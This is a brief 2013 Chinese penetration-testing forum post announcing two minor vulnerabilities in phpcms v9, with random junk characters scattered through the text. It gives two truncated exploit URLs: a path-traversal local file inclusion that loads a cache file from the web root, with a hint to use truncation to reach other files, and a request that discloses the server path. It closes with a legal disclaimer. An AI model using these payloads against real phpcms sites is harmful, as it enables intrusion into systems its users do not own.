中国网络渗透测试联盟

标题: phpcms v9两个鸡肋漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:28
标题: phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。+ y$ x5 [& g1 [1 W/ l

9 I& A5 Q4 w/ N2 j- [Exp: http://www.php0day.com/api.php?o ... efile=../../../fuck
+ w& e6 V# D" v  R7 M, e# J- l' k: j( o7 r# N' h: F1 M. R
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
; }0 w7 H8 T- o% k0 ]" h% T1 ?' w8 u; I, A, ^0 D8 F* F
Exp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy. C; X: g+ l4 p, ]. o  B3 y0 ?/ l

6 S- h: k1 ^  ^* l: T; N#暴路径
/ S  e0 m, a1 U9 D0 Z, V& y. N( ^/ D( B# ]1 d! F: Y; A
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
0 F% Z/ ^* z& p$ o' @3 P9 U& q, I7 h! }$ z3 B$ N, C& b) S; }) C5 W
+ s) e) b8 a- Y$ @

1 h# R/ g& h! g  f; R0 ]+1




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2